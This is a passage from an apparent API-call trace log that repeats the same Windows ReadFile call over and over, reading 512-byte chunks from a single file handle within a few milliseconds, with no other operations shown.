(in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 
[0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.888] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, 
lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, 
lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.889] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.890] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.891] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.892] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.893] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.894] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 
[0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, 
lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.895] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.896] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, 